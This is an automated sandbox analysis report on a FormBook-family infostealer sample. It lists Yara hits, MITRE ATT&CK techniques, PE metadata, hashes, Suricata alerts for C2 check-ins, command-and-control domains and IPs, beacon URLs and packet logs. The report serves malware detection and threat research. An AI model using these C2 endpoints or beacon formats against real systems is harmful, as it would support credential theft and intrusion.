                  Source: Yara match, File source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.72b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.2cf513c.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                  MITRE ATT&CK matrix, tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
                  Techniques appearing as separate entries in the matrix: DLL Side-Loading, Process Injection, Masquerading, OS Credential Dumping, Security Software Discovery, Email Collection, Encrypted Channel, Abuse Elevation Control Mechanism, Disable or Modify Tools, Process Discovery, Archive Collected Data, Ingress Tool Transfer, Virtualization/Sandbox Evasion, Data from Local System, Non-Application Layer Protocol, Application Window Discovery, Application Layer Protocol, Deobfuscate/Decode Files or Information, File and Directory Discovery, System Information Discovery, Obfuscated Files or Information, Software Packing
                  [Behavior graph: ID 1483009, Sample: dGHiTqj3AB.exe, Startdate: 26/07/2024, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label | Link
                  dGHiTqj3AB.exe | 100% | Joe Sandbox ML | |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                                            unknown
                                            http://www.theiconsummit.life/6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHifalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabmcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designersGdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://asymtos.ai/34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygamcbuilder.exe, 00000008.00000002.3493562644.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.000000000320A000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://duckduckgo.com/ac/?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designers/?dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cn/bThedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers?dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.tiro.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designersdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.goodfont.co.krdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.accessoriestechbd.comfgebfePlJm.exe, 00000009.00000002.3492695958.0000000000B67000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sajatypeworks.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.typography.netDdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cn/cThedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleasedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fonts.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sandoll.co.krdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleasedGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cndGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comdGHiTqj3AB.exe, 00000000.00000002.1757032878.0000000005630000.00000004.00000020.00020000.00000000.sdmp, dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.ecosia.org/newtab/mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.bosonserver.net/x10g/?bPD=AtIpZIbrclbIO3wVVorP/mcbuilder.exe, 00000008.00000002.3493562644.00000000044A6000.00000004.10000000.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000002.3493242754.0000000002EE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.carterandcone.comldGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNdGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.founder.com.cn/cndGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/frere-user.htmldGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8dGHiTqj3AB.exe, 00000000.00000002.1757333710.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mcbuilder.exe, 00000008.00000003.2619818329.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              195.200.3.58
                                              bosonserver.netUnited Kingdom
                                              8897KCOM-SPNService-ProviderNetworkex-MistralGBfalse
                                              103.29.180.74
                                              accessoriestechbd.comunknown
                                              4686BEKKOAMEBEKKOAMEINTERNETINCJPfalse
                                              3.33.130.190
                                              hourglasspoise.netUnited States
                                              8987AMAZONEXPANSIONGBfalse
                                              217.160.164.240
                                              asymtos.techGermany
                                              8560ONEANDONE-ASBrauerstrasse48DEfalse
                                              203.161.42.162
                                              www.lontos.topMalaysia
                                              45899VNPT-AS-VNVNPTCorpVNfalse
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1483009
Start date and time: 2024-07-26 13:54:28 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: dGHiTqj3AB.exe
renamed because original name is a hash value
Original Sample Name: 1f5c95d40c06c01300f0a6592945a72d.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@7/5
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 100
• Number of non-executed functions: 286
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• VT rate limit hit for: dGHiTqj3AB.exe
Time        Type               Description
07:57:08    API Interceptor    3808582x Sleep call for process: mcbuilder.exe modified
                                              Process:C:\Users\user\Desktop\dGHiTqj3AB.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                              Process:C:\Windows\SysWOW64\mcbuilder.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):0.9746603542602881
                                              Encrypted:false
                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.752827643333699
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:dGHiTqj3AB.exe
                                              File size:951'296 bytes
                                              MD5:1f5c95d40c06c01300f0a6592945a72d
                                              SHA1:79a217ed19833efcf640ffd8bb04803e9f30d6f4
                                              SHA256:434ec59b680788bae7f2935200a77e681cecbb517d853c6e6cf31f4cf112e5cc
                                              SHA512:3cd70090e071e43b22a3638d8cdf13874c5da34aff2cb314e170feda59d630594314f45708797d83a47ed645a7f07755ac10f4a438858e6673ce560fe5f57975
                                              SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                                              TLSH:5B1512507E9CEFA6D679C3F898B3928663F1623F8421DACD4FD260D71835F414660A8B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`..f..............0..x............... ........@.. ....................................@................................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x4e961e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6696C660 [Tue Jul 16 19:13:36 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe95c9 | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xea000 | 0x618 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xec000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe6d28 | 0x54 | .text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0xe7624 | 0xe7800 | a80dc334650030aacdd3bdfacd3dc345 | False | 0.8819308517818575 | data | 7.760978166314589 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0xea000 | 0x618 | 0x800 | d23b1ec2e2678d53ba82fe023e10eafd | False | 0.33740234375 | data | 3.457849924964285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0xec000 | 0xc | 0x200 | 3ca0c11b7681be6b24249ecfdc5bfb10 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_VERSION | 0xea090 | 0x388 | data |  |  | 0.4247787610619469
                                              RT_MANIFEST | 0xea428 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
                                              DLL | Import
                                              mscoree.dll | _CorExeMain
                                              Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                              2024-07-26T13:58:07.135377+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49762 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:57:10.036735+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49745 | 80 | 192.168.2.4 | 195.200.3.58
                                              2024-07-26T13:57:35.005440+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49752 | 80 | 192.168.2.4 | 217.160.164.240
                                              2024-07-26T13:57:12.627565+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.4 | 195.200.3.58
                                              2024-07-26T13:57:56.269959+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49759 | 80 | 192.168.2.4 | 203.161.42.162
                                              2024-07-26T13:57:24.070738+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49749 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:58:16.188839+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49764 | 80 | 192.168.2.4 | 103.29.180.74
                                              2024-07-26T13:58:19.218798+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49765 | 80 | 192.168.2.4 | 103.29.180.74
                                              2024-07-26T13:56:15.151948+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49741 | 40.68.123.157 | 192.168.2.4
                                              2024-07-26T13:57:51.120537+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49757 | 80 | 192.168.2.4 | 203.161.42.162
                                              2024-07-26T13:57:48.598378+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49756 | 80 | 192.168.2.4 | 203.161.42.162
                                              2024-07-26T13:58:01.968155+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49760 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:58:27.994998+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49767 | 80 | 192.168.2.4 | 103.29.180.74
                                              2024-07-26T13:57:21.514806+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49748 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:56:46.525961+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:57:42.778805+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49755 | 80 | 192.168.2.4 | 217.160.164.240
                                              2024-07-26T13:57:26.659151+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:57:07.403866+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49744 | 80 | 192.168.2.4 | 195.200.3.58
                                              2024-07-26T13:57:37.598909+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49753 | 80 | 192.168.2.4 | 217.160.164.240
                                              2024-07-26T13:57:53.745534+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49758 | 80 | 192.168.2.4 | 203.161.42.162
                                              2024-07-26T13:57:29.248423+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49751 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:55:36.931527+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49735 | 40.68.123.157 | 192.168.2.4
                                              2024-07-26T13:58:21.796033+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49766 | 80 | 192.168.2.4 | 103.29.180.74
                                              2024-07-26T13:58:09.696547+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49763 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:57:15.383180+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49747 | 80 | 192.168.2.4 | 195.200.3.58
                                              2024-07-26T13:58:04.542850+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49761 | 80 | 192.168.2.4 | 3.33.130.190
                                              2024-07-26T13:57:40.170047+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.4 | 217.160.164.240
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jul 26, 2024 13:57:39.567459106 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567485094 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:39.567512035 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:40.169842958 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:40.169996023 CEST8049754217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:40.170047045 CEST4975480192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:41.081263065 CEST4975480192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.135001898 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.139982939 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.140058041 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.160996914 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.166980028 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.775219917 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.775408983 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:42.778805017 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.786786079 CEST4975580192.168.2.4217.160.164.240
                                              Jul 26, 2024 13:57:42.792135000 CEST8049755217.160.164.240192.168.2.4
                                              Jul 26, 2024 13:57:47.937517881 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:47.943717957 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:47.943799973 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:47.969371080 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:47.974838972 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:48.598254919 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:48.598279953 CEST8049756203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:48.598377943 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:49.483828068 CEST4975680192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.516726017 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.522052050 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:50.522138119 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.546781063 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:50.551923990 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:51.119266987 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:51.119677067 CEST8049757203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:51.120537043 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:52.046986103 CEST4975780192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.078775883 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.083863974 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.088535070 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.114577055 CEST4975880192.168.2.4203.161.42.162
                                              Jul 26, 2024 13:57:53.119837999 CEST8049758203.161.42.162192.168.2.4
                                              Jul 26, 2024 13:57:53.119894981 CEST8049758203.161.42.162192.168.2.4
